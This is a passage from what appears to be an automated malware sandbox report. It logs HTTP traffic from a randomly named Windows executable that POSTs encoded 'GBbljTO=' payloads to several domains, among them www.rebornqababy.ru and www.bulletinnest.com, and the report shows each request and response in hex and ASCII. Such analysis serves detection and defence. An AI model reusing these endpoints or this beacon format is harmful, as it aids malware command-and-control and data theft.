                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 72 64 77 73 76 6b 45 79 59 67 39 6a 54 50 66 36 63 70 57 6f 37 42 4d 56 4d 58 43 74 70 44 54 4e 70 78 54 41 30 70 36 4b 61 74 72 4b 51 2f 35 4f 69 63 70 73 73 34 6d 73 74 46 45 52 38 33 49 74 43 33 63 6d 2b 64 55 39 47 70 62 53 51 67 77 37 4f 71 39 55 75 56 33 77 64 4d 4b 44 30 56 61 61 65 66 43 50 4f 32 56 61 6f 50 2b 78 6c 71 4c 69 4f 6c 65 31 69 51 79 66 6b 6d 51 78 6f 74 2b 32 32 63 61 6b 58 30 33 4f 50 55 4e 43 74 64 72 77 63 63 33 38 6f 49 36 79 42 7a 64 4a 2b 75 52 48 6f 61 43 31 48 2f 42 44 33 39 6a 59 34 4a 59 67 36 49 42 63 37 38 49 73 59 56 66 65 61 48 31 56 4c 65 77 70 46 32 34 30 63 64 45 52 6d 78 79 77 74 59 74 48 30 66 5a 6e 72 6d 4e 7a 75 4e 63 4c 58 53 7a 48 46 6a 70 2f 31 4a 37 4d 31 74 6d 66 4e 31 75 46 51 46 6b 4f 78 5a 50 45 48 66 31 6f 57 4b 6e 34 39 64 43 70 50 50 55 35 53 73 58 50 66 64 4c 6e 38 6f 76 68 49 61 6f 52 46 43 4d 64 56 71 66 2b 36 39 4f 35 6b 39 4e 68 4c 51 65 37 30 4f 73 6e 6d 37 67 36 7a 77 64 2f 47 68 2f 51 43 4c 76 6f 75 43 59 6d 2f 48 [TRUNCATED]
                                                          Data Ascii: GBbljTO=rdwsvkEyYg9jTPf6cpWo7BMVMXCtpDTNpxTA0p6KatrKQ/5Oicpss4mstFER83ItC3cm+dU9GpbSQgw7Oq9UuV3wdMKD0VaaefCPO2VaoP+xlqLiOle1iQyfkmQxot+22cakX03OPUNCtdrwcc38oI6yBzdJ+uRHoaC1H/BD39jY4JYg6IBc78IsYVfeaH1VLewpF240cdERmxywtYtH0fZnrmNzuNcLXSzHFjp/1J7M1tmfN1uFQFkOxZPEHf1oWKn49dCpPPU5SsXPfdLn8ovhIaoRFCMdVqf+69O5k9NhLQe70Osnm7g6zwd/Gh/QCLvouCYm/HFPN4I1QBTG7yt7FjniJolanGNYMp/9ZMVPNOlGfL4vSFrYQY8o9hllsznucHNgcDUJv9xHNkJAMKgTeVih2vLzXkfxxK6OMhBsQRbTmtaKPekvIIuN/hZwcoKeOjb+B6re8B0UM65DoB4clA5Hv11U8usI5ITVWRm3sVpNdN8R2RaPsi4mmv1smMJH6lJwxy4BGAkzay+45adHVk7wksRLLkY8YWBISso5/0I0Qr1IG8tMAmRt+LFRPAf5XzWVwD+XZW6eG4w5zJtGUqwwkiRW/NHJTVcTbku0OM7tiofaj8M2Csbj9fQ2t9o41rhC1WtNLiZ27HT58SGQdVuUN//UWEJ8FvV8HXn6h81naVjPO0Fe5SwhySwjWk6+4YHcNnWZ1khCPBpOoe+w97wSzlGcK9vKcNpvAbv4ot8bkzl51yie/P+z4tuTh2pQWZzEKuWQwPG1/gIdjF0+OPbgPdtFRfZrcZyvgBs4KnujuvfrpK9YmugeSH42Ok2wLybRfi06WLG4wQ6sVrQrDuJNmmekapA0UXJpv4KLhFG+6lHUBEcZCyPbBfycdMTcG9r2TtnqNDXaISiJnU+YH5pm1asRgzg0lxREfTi8xJJ6EqElRSIq/BpIi3ixmYOY2r56hXg7Ug5B5v30ddcLSdRJLmN94PMV+44sYNHA [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.6497553.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:01.357569933 CEST483OUTGET /4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.hereboy.co.uk
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:01.825535059 CEST408INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:05:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 42 62 6c 6a 54 4f 3d 6d 66 59 4d 73 51 4d 33 4b 79 68 4f 42 39 53 35 52 61 53 57 32 79 35 72 4c 6d 7a 4c 67 6a 61 61 2f 51 4c 51 77 49 71 56 56 35 57 59 51 73 34 35 7a 50 30 65 76 4b 37 52 6a 6c 39 6b 37 30 51 61 4e 42 41 50 6b 72 34 39 4d 73 69 54 46 56 59 77 46 59 42 55 34 55 4c 35 5a 62 69 2f 32 6c 6e 62 44 64 6d 68 51 48 78 35 68 76 4b 53 6c 61 76 69 48 46 61 2b 6c 56 6d 64 6e 32 6b 78 2f 4d 4f 53 2b 4c 47 4f 41 43 6f 3d 26 6d 42 3d 72 4c 34 6c 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.64975687.236.19.24380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:07.146040916 CEST755OUTPOST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 69 47 7a 44 4c 74 47 67 2b 68 4c 4f 30 56 6f 63 7a 5a 33 55 58 43 35 44 6f 6c 75 49 30 4a 42 58 53 78 42 6f 75 58 76 74 79 75 79 43 49 63 33 35 69 51 75 75 49 69 53 31 78 72 6c 6b 33 69 55 6c 68 73 42 37 73 56 4a 6b 65 61 4d 74 39 67 46 4f 79 4f 67 35 63 72 51 70 4c 6c 67 57 53 50 2f 61 42 57 79 4a 67 68 49 4c 6f 53 50 61 31 77 50 72 54 57 6f 65 62 34 56 47 58 4d 56 4c 48 68 30 42 54 47 4e 67 2b 56 4b 32 59 4a 4c 37 4a 71 39 70 73 48 76 48 79 69 74 79 62 2b 74 39 45 6c 79 72 6d 34 59 66 42 32 31 47 35 32 51 4a 72 7a 78 70 57 6a 47 57 48 77 38 56 30 54 4d 49 7a 4d 4f 6d 66 2b 43 47 2b 6f 54 4d 59 51 78 71
                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO0VoczZ3UXC5DoluI0JBXSxBouXvtyuyCIc35iQuuIiS1xrlk3iUlhsB7sVJkeaMt9gFOyOg5crQpLlgWSP/aBWyJghILoSPa1wPrTWoeb4VGXMVLHh0BTGNg+VK2YJL7Jq9psHvHyityb+t9Elyrm4YfB21G52QJrzxpWjGWHw8V0TMIzMOmf+CG+oTMYQxq
                                                          Jul 2, 2024 14:05:07.903883934 CEST479INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:07 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.64975787.236.19.24380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:09.688976049 CEST779OUTPOST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 69 47 7a 44 4c 74 47 67 2b 68 4c 4f 33 32 41 63 79 36 66 55 41 79 35 43 74 6c 75 49 6a 5a 42 4c 53 78 39 6f 75 54 2f 39 7a 63 57 43 49 39 48 35 68 56 43 75 64 69 53 31 36 4c 6b 76 70 53 55 75 68 72 4a 5a 73 52 4a 6b 65 61 6f 74 39 6c 68 4f 79 34 6f 36 65 37 51 76 53 56 67 55 4b 76 2f 61 42 57 79 4a 67 69 30 78 6f 53 58 61 32 41 66 72 42 43 30 5a 61 34 56 48 48 63 56 4c 51 52 30 4e 54 47 4e 65 2b 55 58 52 59 4d 58 37 4a 76 5a 70 74 57 76 41 38 69 73 33 66 2b 73 44 4d 55 58 42 6a 5a 68 6f 4e 6d 64 61 69 30 77 34 6a 6c 77 7a 4b 51 47 31 56 67 63 58 30 52 55 36 7a 73 4f 4d 64 2b 36 47 73 2f 66 72 58 6b 55 4a 74 33 57 72 51 39 2f 7a 6e 41 4f 6e 53 39 7a 52 35 75 62 52 79 51 3d 3d
                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO32Acy6fUAy5CtluIjZBLSx9ouT/9zcWCI9H5hVCudiS16LkvpSUuhrJZsRJkeaot9lhOy4o6e7QvSVgUKv/aBWyJgi0xoSXa2AfrBC0Za4VHHcVLQR0NTGNe+UXRYMX7JvZptWvA8is3f+sDMUXBjZhoNmdai0w4jlwzKQG1VgcX0RU6zsOMd+6Gs/frXkUJt3WrQ9/znAOnS9zR5ubRyQ==
                                                          Jul 2, 2024 14:05:10.440665960 CEST479INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:10 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.64975887.236.19.24380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:12.219038963 CEST1792OUTPOST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 69 47 7a 44 4c 74 47 67 2b 68 4c 4f 33 32 41 63 79 36 66 55 41 79 35 43 74 6c 75 49 6a 5a 42 4c 53 78 39 6f 75 54 2f 39 7a 63 65 43 4a 50 2f 35 6a 32 36 75 50 53 53 31 33 72 6b 73 70 53 55 2f 68 74 68 64 73 52 4e 61 65 59 67 74 76 54 74 4f 6a 74 49 36 45 72 51 76 61 31 67 56 53 50 2b 59 42 53 76 4f 67 69 6b 78 6f 53 58 61 32 43 58 72 52 6d 6f 5a 59 34 56 47 58 4d 56 35 48 68 30 70 54 47 31 4f 2b 55 54 72 59 34 62 37 49 50 70 70 72 6b 48 41 6a 79 73 35 59 2b 73 4c 4d 55 72 61 6a 59 4d 54 4e 6d 5a 38 69 33 73 34 79 42 31 62 51 43 4b 4f 44 54 38 47 72 78 55 6c 79 37 37 6e 52 73 36 4a 67 70 54 74 61 67 41 6c 70 7a 53 45 62 62 2b 4d 68 67 4f 49 63 37 61 41 79 74 71 48 70 4f 41 66 6d 77 71 44 66 4d 31 6c 6e 79 38 55 70 4b 38 6b 4d 75 2b 37 58 47 72 6f 62 47 79 52 78 70 2f 4a 61 35 55 62 6f 4d 4b 56 75 74 46 68 64 6f 79 6e 54 73 6a 65 37 67 2f 6e 56 56 56 70 6b 70 69 71 5a 6f 37 52 4c 71 44 63 78 47 74 6c 6f 68 75 71 34 67 43 45 52 46 74 6c 31 51 43 6c 35 4d 79 4f 6a 4e 56 61 73 37 [TRUNCATED]
                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO32Acy6fUAy5CtluIjZBLSx9ouT/9zceCJP/5j26uPSS13rkspSU/hthdsRNaeYgtvTtOjtI6ErQva1gVSP+YBSvOgikxoSXa2CXrRmoZY4VGXMV5Hh0pTG1O+UTrY4b7IPpprkHAjys5Y+sLMUrajYMTNmZ8i3s4yB1bQCKODT8GrxUly77nRs6JgpTtagAlpzSEbb+MhgOIc7aAytqHpOAfmwqDfM1lny8UpK8kMu+7XGrobGyRxp/Ja5UboMKVutFhdoynTsje7g/nVVVpkpiqZo7RLqDcxGtlohuq4gCERFtl1QCl5MyOjNVas7snPTbQeZKiwWQ+rVUiMPvWcwnyGiiZLdFxpy2TjOcKtiMnIXO7+zvDgvcMPVUAcA0I24xsGYiOfwRG5v66Lf9Gxx7cU4x2jWDgTwXtiJjCbP5tYE7NiWSdrlbkioDyMU/xefr7DJXQwQlDuqnvDO4SN2W/hhCBkx2dd+YnyS9hZLYqMuoq5vqwCrSPyqKzsUx+2ktzGfl9nqXD3WOBIEts7v3Szq1iQBkBbHNBE6gl4G0E8Prw6gl8QBRw3vJe6jxLO5TDCgHu61udOoT2TX6anHneQFuyr9PwWaohvwd4zUP1AZly7vgdGvmZyBJEtbhjfK+/16KpgnWoTG9lxvnoLtEpAlkrCyltq5OV93C/O7V1Xi7QD+aAYy5foeAfmupTfC3Jun0sV4Dsp9GHI/7Lxh2RX8gG4uUrsBqd2LS3IFNNO6M9AHYXmqDnnsmui827j3RqqSKdSNHJFVJjz5IkjDSBToG76W4bbTlZice1HjaA0furptYH0eu9zKp3UVH9c6WHvdNzQC/vrEUGejiNF/NP9xZGwjmUJGbgOMP/cgBShSXpvxnobLbsUSOp71LxeNyte2lgrrEbvap/cMk66MLhBaub19I71Xq4AIdxfkx5Uq4AYlyrHhU34HXidiUs+6mIKQ8qK9HC00GyntrgIWKmHt85gcXB [TRUNCATED]
                                                          Jul 2, 2024 14:05:13.036138058 CEST479INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:12 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f a9 19 49 61 4d ba 49 6a dd 7f 6f da 45 f0 32 f0 66 be 79 bc c7 af ca 97 ad 7c 6f 2a 78 92 cf 35 34 ed 63 bd df c2 ea 16 71 5f c9 1d 62 29 cb cb 65 cd 72 c4 ea b0 12 19 37 f1 eb 28 b8 21 a5 93 88 7d 3c 92 28 f2 02 0e 2e c2 ce 8d 56 73 bc 2c 33 8e 0b c4 3b a7 cf f3 df 9d f8 c7 24 95 f1 41 48 43 e0 e9 34 52 88 a4 a1 7d ad 61 52 01 6c e2 3e 67 0e 9c 85 68 fa 00 81 fc 37 79 c6 71 98 9d 7c 1a 4a 6b 4f 21 88 87 41 7d 18 c2 35 2b d8 66 03 d7 ad ed 7f 6e e0 6d c1 41 45 98 a6 89 79 ea 9c b7 27 d5 a9 ee cc fc 08 8d f3 11 ee 73 8e 7f 1e 29 ea 12 32 c5 9a cb 65 bf 17 93 61 4a 17 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eaMAK0`.]B]IaMIjoE2fy|o*x54cq_b)er7(!}<(.Vs,3;$AHC4R}aRl>gh7yq|JkO!A}5+fnmAEy's)2eaJ0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.64975987.236.19.24380280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:14.826283932 CEST485OUTGET /waey/?mB=rL4lP&GBbljTO=vEbjId+4sF/B1HcK0KnkLWhDt3TDgep1Hisls3jx2sXQLvzc6GGIRAe645U1+0UQoLxHlXEWQ40RpQdm4vEPEKgmfigQSYTBcDja0ho8qyrlnSuwRRMraqkdBe97SwcqQ2Bw4z4= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.rebornqababy.ru
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:15.585630894 CEST482INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:15 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 279
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 65 62 6f 72 6e 71 61 62 61 62 79 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rebornqababy.ru Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.649760135.181.212.20680280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:05:20.690686941 CEST758OUTPOST /r7gq/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.bulletinnest.com
                                                          Origin: http://www.bulletinnest.com
                                                          Referer: http://www.bulletinnest.com/r7gq/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 45 37 77 33 42 62 38 6d 42 6e 61 6a 4f 67 6d 6a 2f 61 56 4d 63 4f 45 31 6c 77 74 6c 47 66 6b 4c 64 34 71 53 6e 39 59 36 49 46 71 34 47 34 32 6b 45 4e 63 6f 34 63 2f 75 47 42 6c 7a 74 57 72 72 4e 32 67 77 6f 30 34 30 4d 6a 61 67 6a 67 6a 62 76 51 76 4a 6d 55 76 56 69 72 67 46 4c 42 44 53 61 34 6f 52 67 42 30 30 37 6f 6d 79 51 76 4a 41 2b 6e 4e 50 74 38 32 79 76 4d 6e 55 7a 6e 42 6e 32 6b 57 2f 32 71 33 42 72 34 55 6f 54 6f 35 61 69 44 71 31 2f 72 58 34 79 62 59 33 4d 6e 59 31 7a 41 47 77 55 53 2f 63 6b 53 73 4f 32 72 77 68 34 68 49 46 4f 42 34 39 38 50 38 6d 39 79 42 5a 5a 33 5a 67 67 6e 4e 65 6c 2b 73 68
                                                          Data Ascii: GBbljTO=E7w3Bb8mBnajOgmj/aVMcOE1lwtlGfkLd4qSn9Y6IFq4G42kENco4c/uGBlztWrrN2gwo040MjagjgjbvQvJmUvVirgFLBDSa4oRgB007omyQvJA+nNPt82yvMnUznBn2kW/2q3Br4UoTo5aiDq1/rX4ybY3MnY1zAGwUS/ckSsO2rwh4hIFOB498P8m9yBZZ3ZggnNel+sh
                                                          Jul 2, 2024 14:05:21.698502064 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:21 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://bulletinnest.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                          Connection: close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 66 30 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 32 2e 36 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f [TRUNCATED]
                                                          Data Ascii: 1f0b<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.6 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://bulletinnest.com/#website","url":"https://bulletinnest.com/","name":"bulletinnest","description":"","publisher":{"@id":"https://bulletinnest.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://
